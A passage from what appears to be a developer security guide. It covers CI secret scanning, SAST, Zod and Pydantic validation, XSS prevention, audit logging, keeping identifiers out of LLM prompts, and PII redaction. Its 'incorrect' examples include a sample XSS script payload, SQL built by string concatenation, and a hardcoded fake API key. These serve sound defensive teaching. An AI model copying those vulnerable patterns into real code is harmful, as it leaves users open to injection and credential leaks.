| Moderate | > 20 | WARNING |
| Low | > 50 | WARNING |
Key rules:
- Run
npm auditorpip-auditin CI — block on critical/high findings - Use
--jsonoutput for automation (not human-readable format) - Container scanning with Trivy catches OS-level vulnerabilities npm/pip miss
- Auto-fix with
npm audit fixonly for non-breaking updates; review breaking fixes manually
Secret Detection
Prevent credentials, API keys, and tokens from being committed to repositories.
Incorrect — relying on .gitignore alone:
# .gitignore only prevents file-level commits, not inline secrets
echo "API_KEY=sk-live-abc123" >> config.py
git add config.py # Secret committed — now in git history foreverCorrect — multi-layer secret detection:
# TruffleHog (scans entire git history)
trufflehog git file://. --json > secrets-scan.json
# Gitleaks (fast, pre-commit friendly)
gitleaks detect --source . --report-format json
# Check results
SECRET_COUNT=$(cat secrets-scan.json | jq '. | length')
if [ "$SECRET_COUNT" -gt 0 ]; then
echo "BLOCK: $SECRET_COUNT secrets detected!"
exit 1
fiPre-commit hooks (most effective layer):
# .pre-commit-config.yaml
repos:
# Gitleaks — fast pattern matching
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
# detect-secrets — supports baselines for false positives
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ["--baseline", ".secrets.baseline"]Baseline for false positives:
# Generate baseline (marks existing non-secrets)
detect-secrets scan > .secrets.baseline
# Audit false positives interactively
detect-secrets audit .secrets.baselineKey rules:
- Use pre-commit hooks as first line of defense — catches secrets before they enter history
- TruffleHog for deep history scanning; Gitleaks for fast pre-commit checks
- If a secret is committed, rotate it immediately — removing from history is not enough
- Use
.secrets.baselineto suppress false positives (e.g., example keys in docs) - Run both pre-commit AND CI scanning — defense in depth
Static Analysis (SAST)
Run static application security testing to catch vulnerabilities in source code.
Incorrect — relying only on linters for security:
# ESLint/Pylint catch style issues, not security vulnerabilities
eslint . # Does not detect SQL injection, SSRF, or path traversalCorrect — dedicated SAST tools:
# Semgrep (multi-language, auto rules include OWASP patterns)
semgrep --config=auto --json > semgrep-results.json
CRITICAL=$(cat semgrep-results.json | jq '[.results[] | select(.extra.severity == "ERROR")] | length')
if [ "$CRITICAL" -gt 0 ]; then
echo "BLOCK: $CRITICAL critical SAST findings"
exit 1
fi# Bandit (Python-specific)
bandit -r . -f json -o bandit-report.json
HIGH=$(cat bandit-report.json | jq '[.results[] | select(.issue_severity == "HIGH")] | length')Pre-commit integration (shift-left):
# .pre-commit-config.yaml
repos:
- repo: https://github.com/semgrep/semgrep
rev: v1.52.0
hooks:
- id: semgrep
args: ["--config", "auto", "--error"]
- repo: https://github.com/PyCQA/bandit
rev: 1.7.7
hooks:
- id: bandit
args: ["-c", "pyproject.toml", "-r", "."]
exclude: ^tests/CI integration:
# GitHub Actions
- name: SAST scan
run: |
semgrep --config=auto --json > sast.json
ERRORS=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' sast.json)
if [ "$ERRORS" -gt 0 ]; then
echo "::error::$ERRORS critical SAST findings"
exit 1
fiKey rules:
- Use
semgrep --config=autofor broad OWASP coverage across languages - Bandit is Python-specific — pair with Semgrep for multi-language projects
- Run SAST in pre-commit hooks (shift-left) AND CI (enforce)
- Block on ERROR severity; WARNING findings go to review queue
Validate input with server-side schemas using Zod and Pydantic with allowlist patterns — HIGH
Input Schema Validation
Core Principles
- Never trust user input
- Validate on server-side (client-side is UX only)
- Use allowlists (not blocklists)
- Validate type, length, format, range
Zod v4 Schema
import { z } from 'zod';
const UserSchema = z.object({
email: z.string().email(),
name: z.string().min(2).max(100),
age: z.coerce.number().int().min(0).max(150),
role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({ errors: result.error.flatten() });
}Type Coercion (v4)
// Query params come as strings - coerce to proper types
z.coerce.number() // "123" -> 123
z.coerce.boolean() // "true" -> true
z.coerce.date() // "2024-01-01" -> DatePydantic (Python)
from pydantic import BaseModel, EmailStr, Field, field_validator
class User(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def strip_and_title(cls, v: str) -> str:
return v.strip().title()Express Middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({
error: 'Validation failed',
details: result.error.flatten().fieldErrors,
});
}
req.body = result.data;
next();
};
}
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
const user = req.body; // fully typed and validated
});Query Parameter Validation
const PaginationSchema = z.object({
page: z.coerce.number().int().positive().default(1),
limit: z.coerce.number().int().min(1).max(100).default(20),
sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
order: z.enum(['asc', 'desc']).default('desc'),
});Anti-Patterns
// NEVER rely on client-side validation only
if (formIsValid) submit(); // No server validation
// NEVER use blocklists
const blocked = ['password', 'secret']; // Easy to miss fields
// NEVER build queries with string concat
"SELECT * FROM users WHERE name = '" + name + "'" // SQL injection
// ALWAYS validate server-side
const result = schema.safeParse(req.body);
// ALWAYS use allowlists
const allowed = ['name', 'email', 'createdAt'];
// ALWAYS use parameterized queries
db.query('SELECT * FROM users WHERE name = ?', [name]);Key Decisions
| Decision | Recommendation |
|---|---|
| Validation library | Zod (TS), Pydantic (Python) |
| Strategy | Allowlist over blocklist |
| Location | Server-side always |
| Error messages | Generic (don't leak info) |
Incorrect — Trusting client-side validation allows attackers to bypass checks:
// Client-side only
const email = document.getElementById('email').value;
if (email.includes('@')) {
await fetch('/api/users', { method: 'POST', body: JSON.stringify({ email }) });
}
// Attacker can bypass with curl/PostmanCorrect — Server-side schema validation with Zod ensures all input is validated:
app.post('/api/users', validateBody(z.object({
email: z.string().email(),
})), async (req, res) => {
// req.body.email is validated regardless of client
});Validation: Output Encoding & XSS Prevention — HIGH
Output Encoding & XSS Prevention
HTML Sanitization (Python)
from markupsafe import escape
@app.route('/comment', methods=['POST'])
def create_comment():
content = escape(request.form['content'])
db.execute("INSERT INTO comments (content) VALUES (?)", [content])HTML Sanitization (JavaScript)
import DOMPurify from 'dompurify';
// Sanitize HTML input with allowed tags
const sanitizedHtml = DOMPurify.sanitize(userInput, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href'],
});XSS Prevention
Safe — textContent and React auto-escaping:
// SAFE: textContent escapes HTML entities
element.textContent = userInput;
// React is safe by default
<div>{userInput}</div> // Auto-escapedDangerous — innerHTML and dangerouslySetInnerHTML bypass escaping:
// DANGEROUS: innerHTML can execute scripts
element.innerHTML = userInput; // NEVER do this with user input
// DANGEROUS: bypasses React escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />Server-Side XSS Prevention (Flask)
from flask import request, render_template_string
from markupsafe import escape
@app.route('/greet')
def greet():
name = request.args.get('name', '')
return f"<h1>Hello, {escape(name)}!</h1>"
# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
return render_template_string(
"<h1>Hello, {{ name }}!</h1>",
name=request.args.get('name', '')
)Security Headers
SECURITY_HEADERS = {
"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "DENY",
"X-XSS-Protection": "1; mode=block",
"Referrer-Policy": "strict-origin-when-cross-origin",
"Content-Security-Policy": "default-src 'self'",
}
@app.after_request
def add_security_headers(response):
for header, value in SECURITY_HEADERS.items():
response.headers[header] = value
return responseSRI for CDN Scripts
<script src="https://cdn.example.com/lib.js"
integrity="sha384-..."
crossorigin="anonymous"></script>Anti-Patterns
// NEVER use innerHTML with user input
element.innerHTML = userInput;
// NEVER use dangerouslySetInnerHTML without sanitization
<div dangerouslySetInnerHTML={{__html: userInput}} />
// NEVER trust Content-Type header for file validation
if (file.type === 'image/png') {...} // Can be spoofed
// ALWAYS use textContent or DOMPurify
element.textContent = userInput;
const safe = DOMPurify.sanitize(userInput);Incorrect — Using innerHTML with user content allows XSS script injection:
const userComment = "<script>alert('XSS')</script>";
element.innerHTML = userComment;
// Script executes, stealing cookies/tokensCorrect — Using textContent automatically escapes HTML and prevents XSS:
const userComment = "<script>alert('XSS')</script>";
element.textContent = userComment;
// Renders as plain text: "<script>alert('XSS')</script>"Validation: Advanced Schemas & File Validation — HIGH
Advanced Schemas & File Validation
Discriminated Unions
const NotificationSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('email'),
email: z.string().email(),
subject: z.string().min(1),
body: z.string().min(1),
}),
z.object({
type: z.literal('sms'),
phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
message: z.string().max(160),
}),
z.object({
type: z.literal('push'),
deviceToken: z.string().min(1),
title: z.string().max(50),
body: z.string().max(200),
}),
]);File Upload Validation
const FileUploadSchema = z.object({
filename: z.string().min(1).max(255),
mimeType: z.enum([
'image/jpeg', 'image/png', 'image/webp', 'application/pdf',
]),
size: z.number().max(10 * 1024 * 1024, 'File must be under 10MB'),
});
// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
'image/jpeg': [0xFF, 0xD8, 0xFF],
'image/png': [0x89, 0x50, 0x4E, 0x47],
'image/webp': [0x52, 0x49, 0x46, 0x46],
'application/pdf': [0x25, 0x50, 0x44, 0x46],
};
function validateFileContent(buffer: Buffer, mimeType: string): boolean {
const expected = imageMagicBytes[mimeType];
if (!expected) return false;
return expected.every((byte, i) => buffer[i] === byte);
}URL Validation with Domain Allowlist
const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;
const SafeUrlSchema = z.string()
.url()
.refine(
(url) => {
const { hostname, protocol } = new URL(url);
return protocol === 'https:' &&
(ALLOWED_DOMAINS as readonly string[]).includes(hostname);
},
{ message: 'URL must be HTTPS and from allowed domains' }
);Form Validation with React Hook Form
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const SignupSchema = z.object({
email: z.string().email('Invalid email'),
password: z.string()
.min(8, 'Password must be at least 8 characters')
.regex(/[A-Z]/, 'Must contain uppercase')
.regex(/[0-9]/, 'Must contain number'),
confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
message: "Passwords don't match",
path: ['confirmPassword'],
});
function SignupForm() {
const { register, handleSubmit, formState: { errors } } = useForm({
resolver: zodResolver(SignupSchema),
});
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} />
{errors.email && <span>{errors.email.message}</span>}
<input type="password" {...register('password')} />
<button type="submit">Sign Up</button>
</form>
);
}Allowlist Pattern
// Only allow specific sort columns
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);
// Dynamic allowlist factory
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
return z.enum(allowed as [T, ...T[]]);
}Python Discriminated Union
from pydantic import BaseModel, EmailStr, Field
from typing import Literal, Union
class EmailNotification(BaseModel):
type: Literal['email']
email: EmailStr
subject: str
body: str
class SMSNotification(BaseModel):
type: Literal['sms']
phone: str
message: str = Field(max_length=160)
Notification = Union[EmailNotification, SMSNotification]Key Decisions
| Decision | Recommendation |
|---|---|
| File validation | Check magic bytes, not just extension |
| URL validation | HTTPS + domain allowlist |
| Polymorphic data | Discriminated unions |
| Form validation | Zod + React Hook Form |
Incorrect — Trusting file extension or MIME type allows malicious file uploads:
if (file.name.endsWith('.png') && file.type === 'image/png') {
await uploadFile(file); // Can be spoofed by renaming .exe to .png
}Correct — Validating magic bytes ensures file content matches declared type:
const buffer = await file.arrayBuffer();
const bytes = new Uint8Array(buffer);
const isPNG = bytes[0] === 0x89 && bytes[1] === 0x50 && bytes[2] === 0x4E;
if (isPNG) {
await uploadFile(file); // Verified actual PNG file
}References (15)
Audit Logging
Audit Logging
Purpose
Audit logs answer: Who did What, When, Where, and Why?
They're required for:
- Security incident investigation
- Compliance (SOC2, GDPR, HIPAA)
- Debugging production issues
- Usage analytics
What to Log
Always Log (Audit Events)
| Event Type | What to Log | Example |
|---|---|---|
| Authentication | Success/failure, method | "User login via OAuth" |
| Authorization | Decision, resource, action | "Access granted to analysis_123" |
| Data Access | Read/write, resource type | "Read 10 documents" |
| Data Modification | Before/after (hashed), resource | "Updated analysis status" |
| LLM Calls | Model, tokens, latency (NOT prompt) | "GPT-4, 1500 tokens, 2.3s" |
| Errors | Type, context (sanitized) | "ValidationError on /api/analyze" |
Never Log (Sensitive Data)
| Data Type | Why Not | Alternative |
|---|---|---|
| Passwords | Security | Log "password changed" event |
| API Keys | Security | Log key ID, not value |
| Full Prompts | May contain PII | Log prompt hash, token count |
| LLM Responses | May contain generated PII | Log response hash, length |
| User Content | Privacy | Log content hash, length |
| PII | GDPR/Privacy | Log anonymized or redacted |
Implementation
Sanitized Logger
import structlog
import re
import hashlib
from typing import Any
class SanitizedLogger:
"""Logger that automatically redacts sensitive data"""
REDACT_PATTERNS = {
r"password": "[PASSWORD_REDACTED]",
r"api[_-]?key": "[API_KEY_REDACTED]",
r"secret": "[SECRET_REDACTED]",
r"token": "[TOKEN_REDACTED]",
r"authorization": "[AUTH_REDACTED]",
r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
}
HASH_FIELDS = {"prompt", "response", "content"}
def __init__(self):
self._logger = structlog.get_logger()
def _sanitize(self, data: dict[str, Any]) -> dict[str, Any]:
"""Sanitize sensitive fields"""
result = {}
for key, value in data.items():
# Hash content fields instead of logging
if key.lower() in self.HASH_FIELDS:
result[f"{key}_hash"] = hashlib.sha256(
str(value).encode()
).hexdigest()[:16]
result[f"{key}_length"] = len(str(value))
continue
# Redact sensitive patterns
str_value = str(value)
for pattern, replacement in self.REDACT_PATTERNS.items():
if re.search(pattern, key, re.IGNORECASE):
result[key] = replacement
break
str_value = re.sub(pattern, replacement, str_value, flags=re.IGNORECASE)
else:
result[key] = str_value
return result
def audit(self, event: str, **kwargs):
"""Log an audit event with automatic sanitization"""
sanitized = self._sanitize(kwargs)
self._logger.info(
event,
audit=True,
**sanitized,
)
def info(self, msg: str, **kwargs):
self._logger.info(msg, **self._sanitize(kwargs))
def error(self, msg: str, **kwargs):
self._logger.error(msg, **self._sanitize(kwargs))Audit Event Structure
from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from uuid import UUID
class AuditAction(Enum):
CREATE = "create"
READ = "read"
UPDATE = "update"
DELETE = "delete"
LOGIN = "login"
LOGOUT = "logout"
LLM_CALL = "llm_call"
SEARCH = "search"
@dataclass
class AuditEvent:
"""Structured audit event"""
# WHO
user_id: UUID
tenant_id: UUID
session_id: str
# WHAT
action: AuditAction
resource_type: str
resource_id: UUID | None
# WHEN
timestamp: datetime
# WHERE
request_id: str
trace_id: str
ip_address: str
user_agent: str
# OUTCOME
success: bool
error_code: str | None = None
# CONTEXT (sanitized)
metadata: dict | None = NoneUsage in OrchestKit
# Authentication
logger.audit(
"user.login",
user_id=user.id,
tenant_id=user.tenant_id,
method="oauth",
success=True,
)
# Data Access
logger.audit(
"documents.search",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
query_hash=hash(query), # Not the actual query
result_count=len(results),
success=True,
)
# LLM Call
logger.audit(
"llm.generate",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
model="gpt-4",
input_tokens=1500,
output_tokens=500,
latency_ms=2300,
prompt_hash=hash(prompt), # Not the actual prompt!
success=True,
)
# Authorization Failure
logger.audit(
"authorization.denied",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
action="analysis:delete",
resource_id=analysis_id,
reason="missing permission",
success=False,
)Log Retention
| Environment | Retention | Reason |
|---|---|---|
| Development | 7 days | Debugging |
| Staging | 30 days | Testing |
| Production | 1 year | Compliance |
| Security Events | 7 years | Legal requirements |
Integration with Langfuse
from langfuse import Langfuse
langfuse = Langfuse()
# Create trace for observability
trace = langfuse.trace(
name="analysis",
user_id=str(ctx.user_id), # Langfuse supports user tracking
session_id=ctx.session_id,
metadata={
"tenant_id": str(ctx.tenant_id),
"request_id": ctx.request_id,
},
)
# Log LLM call
generation = trace.generation(
name="content_analysis",
model="gpt-4",
input=prompt, # Langfuse handles securely
output=response,
)Compliance Considerations
GDPR
- Log data access but not the data itself
- Provide audit trail for subject access requests
- Log data deletion events
SOC2
- Log all authentication events
- Log all authorization decisions
- Log all data modifications
- Retain logs for audit period
HIPAA
- Log all access to PHI
- Log user ID, timestamp, action
- Never log PHI content in logs
Context Separation
Context Separation Pattern
The Problem
When identifiers appear in LLM prompts, several security issues arise:
┌─────────────────────────────────────────────────────────┐
│ WHAT HAPPENS WHEN IDs GO INTO PROMPTS │
├─────────────────────────────────────────────────────────┤
│ │
│ "Analyze document doc_abc123 for user usr_xyz789" │
│ │ │ │
│ ▼ ▼ │
│ ┌──────────────────────────────┐ │
│ │ LLM │ │
│ │ │ │
│ │ May hallucinate: │ │
│ │ - doc_abc124 (off by one) │ │
│ │ - doc_xyz789 (mixed up) │ │
│ │ - usr_other (cross-tenant) │ │
│ └──────────────────────────────┘ │
│ │
│ RISKS: │
│ • Hallucinated IDs don't exist → crashes │
│ • Mixed IDs → wrong data attribution │
│ • Cross-tenant IDs → security breach │
│ • IDs in logs/traces → data leakage │
│ │
└─────────────────────────────────────────────────────────┘The Solution: Context Separation
┌─────────────────────────────────────────────────────────┐
│ CORRECT: CONTEXT FLOWS AROUND LLM │
├─────────────────────────────────────────────────────────┤
│ │
│ RequestContext ─────────────────────────────────────► │
│ (user_id, tenant_id, etc.) │ │
│ │ │ │
│ │ ┌──────────────────────┐ │ │
│ │ │ │ │ │
│ ▼ │ LLM │ ▼ │
│ ┌──────────┤ ├─────────────┐ │
│ │ Content │ Sees ONLY: │ Content + │ │
│ │ (text) │ - Document text │ Context │ │
│ │ │ - Query text │ (merged) │ │
│ └──────────┤ - Instructions ├─────────────┘ │
│ │ │ │
│ │ NO IDs! │ │
│ └──────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────┘Implementation
1. Define What's Forbidden
# OrchestKit parameters that NEVER go in prompts
FORBIDDEN_IN_PROMPTS = {
# User identity
"user_id", # UUID - hallucination risk
"tenant_id", # UUID - cross-tenant risk
"session_id", # String - auth context
# Resource references
"analysis_id", # UUID - job tracking
"document_id", # UUID - source tracking
"artifact_id", # UUID - output tracking
"chunk_id", # UUID - RAG reference
# System context
"trace_id", # String - observability
"request_id", # String - request tracking
"workflow_run_id", # UUID - workflow tracking
# Secrets
"api_key", # String - never!
"token", # String - never!
}2. Separate Context from Content
from dataclasses import dataclass
from uuid import UUID
@dataclass
class ContentPayload:
"""What the LLM sees - content only"""
query: str
context_texts: list[str]
instructions: str
@dataclass
class ContextPayload:
"""What flows around the LLM - never in prompt"""
user_id: UUID
tenant_id: UUID
analysis_id: UUID
source_refs: list[UUID]
trace_id: str
async def analyze_content(
content: ContentPayload,
context: ContextPayload,
) -> AnalysisResult:
"""
Content goes TO the LLM.
Context goes AROUND the LLM.
"""
# Build prompt from content only
prompt = build_prompt(
query=content.query,
context_texts=content.context_texts,
instructions=content.instructions,
# NO context payload fields here!
)
# LLM sees content only
llm_output = await llm.generate(prompt)
# Reattach context to output
return AnalysisResult(
content=llm_output,
user_id=context.user_id, # From context
tenant_id=context.tenant_id, # From context
analysis_id=context.analysis_id, # From context
sources=context.source_refs, # From context
)3. Audit Prompts Before Sending
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def audit_prompt(prompt: str) -> list[str]:
"""
Check for forbidden patterns before sending to LLM.
Raises if any IDs detected.
"""
violations = []
# Check for UUIDs
if re.search(UUID_PATTERN, prompt, re.IGNORECASE):
violations.append("UUID detected in prompt")
# Check for ID field names
for forbidden in FORBIDDEN_IN_PROMPTS:
pattern = rf'\b{forbidden}\b'
if re.search(pattern, prompt, re.IGNORECASE):
violations.append(f"Forbidden field '{forbidden}' in prompt")
return violations
# Usage in prompt building
def build_safe_prompt(content: ContentPayload) -> str:
prompt = f"""
Analyze the following content:
{content.query}
Context:
{chr(10).join(content.context_texts)}
"""
# Audit before returning
violations = audit_prompt(prompt)
if violations:
raise PromptSecurityError(
f"Prompt contains forbidden content: {violations}"
)
return promptOrchestKit Integration Points
Content Analysis Workflow
# backend/app/workflows/agents/content_analyzer.py
async def analyze(state: AnalysisState) -> AnalysisState:
# Context is in state, but NOT passed to prompt
ctx = state.request_context
# Build content-only payload
content = ContentPayload(
query=state.analysis_request.query,
context_texts=[doc.content for doc in state.retrieved_docs],
instructions=get_analysis_instructions(),
)
# Context payload for attribution
context = ContextPayload(
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
analysis_id=state.analysis_id,
source_refs=[doc.id for doc in state.retrieved_docs],
trace_id=ctx.trace_id,
)
result = await analyze_content(content, context)
return state.with_result(result)Common Mistakes
# ❌ BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"
# ❌ BAD: ID in f-string
prompt = f"Context from analysis {analysis_id}:\n{context}"
# ❌ BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."
# ✅ GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"
# ✅ GOOD: No IDs visible
prompt = f"""
Analyze this content and provide insights:
{content}
Relevant context:
{context_texts}
"""Testing Context Separation
import pytest
class TestContextSeparation:
def test_prompt_contains_no_uuids(self):
content = ContentPayload(
query="What are the key concepts?",
context_texts=["Machine learning basics..."],
instructions="Provide clear analysis",
)
prompt = build_safe_prompt(content)
assert not re.search(UUID_PATTERN, prompt)
def test_prompt_contains_no_forbidden_fields(self):
content = ContentPayload(...)
prompt = build_safe_prompt(content)
for forbidden in FORBIDDEN_IN_PROMPTS:
assert forbidden not in prompt.lower()
def test_audit_catches_leaked_uuid(self):
bad_prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
violations = audit_prompt(bad_prompt)
assert len(violations) > 0
assert "UUID" in violations[0]Langfuse Mask Callback
Langfuse Mask Callback
Pre-trace PII masking using Langfuse's mask callback for automatic redaction before data reaches the server.
Basic Setup
from langfuse import Langfuse
import re
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}
def mask_pii(data: dict) -> dict:
"""Mask PII in Langfuse trace data before sending."""
def redact_string(value: str) -> str:
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
return value
def redact_recursive(obj):
if isinstance(obj, str):
return redact_string(obj)
elif isinstance(obj, dict):
return {k: redact_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [redact_recursive(item) for item in obj]
return obj
return redact_recursive(data)
langfuse = Langfuse(mask=mask_pii)With Presidio
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def presidio_mask(data: dict) -> dict:
"""Enterprise-grade PII masking with Presidio."""
def anonymize_string(value: str) -> str:
if len(value) < 5:
return value
results = analyzer.analyze(text=value, language="en")
if results:
return anonymizer.anonymize(text=value, analyzer_results=results).text
return value
def process_recursive(obj):
if isinstance(obj, str):
return anonymize_string(obj)
elif isinstance(obj, dict):
return {k: process_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [process_recursive(item) for item in obj]
return obj
return process_recursive(data)
langfuse = Langfuse(mask=presidio_mask)References
Llm Guard Sanitization
LLM Guard Sanitization
Input/output sanitization for LLM pipelines using LLM Guard's Anonymize and Deanonymize scanners.
Installation
pip install llm-guard
python -m spacy download en_core_web_trf # High-accuracy modelBasic Input Sanitization
from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import BERT_LARGE_NER_CONF
from llm_guard.vault import Vault
# Vault stores original values for deanonymization
vault = Vault()
# Initialize scanner with configuration
scanner = Anonymize(
vault=vault,
preamble="", # Text prepended to sanitized output
allowed_names=["John Doe"], # Names to NOT anonymize
hidden_names=["Acme Corp"], # Always anonymize these
recognizer_conf=BERT_LARGE_NER_CONF,
language="en"
)
def sanitize_input(prompt: str) -> tuple[str, bool, float]:
"""
Sanitize user input before sending to LLM.
Returns:
(sanitized_prompt, is_valid, risk_score)
"""
sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
return sanitized_prompt, is_valid, risk_score
# Usage
prompt = "My name is Jane Smith and my email is jane@company.com"
sanitized, valid, risk = sanitize_input(prompt)
# Result: "My name is [REDACTED_PERSON_1] and my email is [REDACTED_EMAIL_1]"Output Deanonymization
from llm_guard.output_scanners import Deanonymize
# Use the same vault from input sanitization
deanonymize_scanner = Deanonymize(vault=vault)
def deanonymize_output(sanitized_prompt: str, model_output: str) -> str:
"""
Restore original values in model output.
Args:
sanitized_prompt: The prompt that was sent to the LLM
model_output: The LLM's response
Returns:
Output with original values restored
"""
restored_output, is_valid, risk_score = deanonymize_scanner.scan(
sanitized_prompt,
model_output
)
return restored_output
# Example flow
original_prompt = "Schedule a meeting with Jane Smith at jane@company.com"
sanitized_prompt, _, _ = scanner.scan(original_prompt)
# sanitized_prompt = "Schedule a meeting with [PERSON_1] at [EMAIL_1]"
llm_response = await llm.generate(sanitized_prompt)
# llm_response = "Meeting scheduled with [PERSON_1]. Confirmation sent to [EMAIL_1]."
final_response = deanonymize_output(sanitized_prompt, llm_response)
# final_response = "Meeting scheduled with Jane Smith. Confirmation sent to jane@company.com."Output Sensitive Data Detection
from llm_guard.output_scanners import Sensitive
# Detect PII in LLM outputs (without prior anonymization)
sensitive_scanner = Sensitive(
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
redact=True, # Replace detected PII with [REDACTED]
threshold=0.5 # Confidence threshold (0-1)
)
def check_output_for_pii(prompt: str, output: str) -> tuple[str, bool, float]:
"""
Check LLM output for leaked PII.
Returns:
(sanitized_output, is_valid, risk_score)
"""
sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
return sanitized_output, is_valid, risk_scoreFull Pipeline Integration
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize, Sensitive
from llm_guard.vault import Vault
from langfuse import observe, get_client
class SecureLLMPipeline:
def __init__(self):
self.vault = Vault()
self.anonymize = Anonymize(vault=self.vault, language="en")
self.deanonymize = Deanonymize(vault=self.vault)
self.sensitive_check = Sensitive(redact=True)
@observe(name="secure_llm_call")
async def process(self, user_input: str) -> str:
"""Secure LLM pipeline with full PII protection."""
# Step 1: Anonymize input
sanitized_input, input_valid, input_risk = self.anonymize.scan(user_input)
get_client().update_current_observation(
metadata={
"input_risk_score": input_risk,
"pii_detected_in_input": not input_valid
}
)
# Step 2: Call LLM with sanitized input
llm_response = await self.llm.generate(sanitized_input)
# Step 3: Check output for leaked PII
checked_output, output_valid, output_risk = self.sensitive_check.scan(
sanitized_input,
llm_response
)
# Step 4: Deanonymize for user (restore original names)
final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]
get_client().update_current_observation(
metadata={
"output_risk_score": output_risk,
"pii_leaked_in_output": not output_valid
}
)
return final_outputConfiguration Options
Anonymize Scanner
from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import (
BERT_LARGE_NER_CONF,
BERT_BASE_NER_CONF,
DISTILBERT_NER_CONF
)
scanner = Anonymize(
vault=vault,
preamble="", # Prepend to output
allowed_names=["Claude", "GPT"], # Don't anonymize these
hidden_names=["Internal Corp"], # Always anonymize these
entity_types=[ # Entities to detect
"PERSON",
"EMAIL_ADDRESS",
"PHONE_NUMBER",
"CREDIT_CARD",
"US_SSN",
"IP_ADDRESS",
"LOCATION"
],
use_faker=True, # Replace with fake data
recognizer_conf=BERT_LARGE_NER_CONF, # NER model config
threshold=0.5, # Confidence threshold
language="en" # Language
)Recognizer Configurations
| Config | Model | Speed | Accuracy |
|---|---|---|---|
| BERT_LARGE_NER_CONF | bert-large | Slow | Highest |
| BERT_BASE_NER_CONF | bert-base | Medium | High |
| DISTILBERT_NER_CONF | distilbert | Fast | Good |
Handling Overlapping Entities
LLM Guard handles overlapping entities automatically:
# Input: "Contact John Smith at john.smith@example.com"
# PERSON: "John Smith" (indices 8-18)
# EMAIL: "john.smith@example.com" (indices 22-45)
# - john.smith overlaps with PERSON
# LLM Guard prioritizes:
# 1. Higher confidence score wins
# 2. Longer span wins if scores equalTesting
import pytest
from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault
def test_anonymization():
vault = Vault()
scanner = Anonymize(vault=vault)
test_input = "Contact John at john@example.com or 555-123-4567"
sanitized, is_valid, risk = scanner.scan(test_input)
# Verify PII is removed
assert "John" not in sanitized
assert "john@example.com" not in sanitized
assert "555-123-4567" not in sanitized
# Verify placeholders are present
assert "[PERSON" in sanitized or "REDACTED" in sanitized
def test_deanonymization():
vault = Vault()
anonymize = Anonymize(vault=vault)
deanonymize = Deanonymize(vault=vault)
original = "Send email to Alice"
sanitized, _, _ = anonymize.scan(original)
# Simulate LLM response
response = f"Email sent to {sanitized.split()[-1]}"
restored, _, _ = deanonymize.scan(sanitized, response)
assert "Alice" in restoredReferences
Logging Redaction
Logging Redaction Patterns
Pre-logging PII redaction with structlog and loguru.
Structlog Processor
import re
import structlog
from typing import Any
# Pre-compile patterns
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
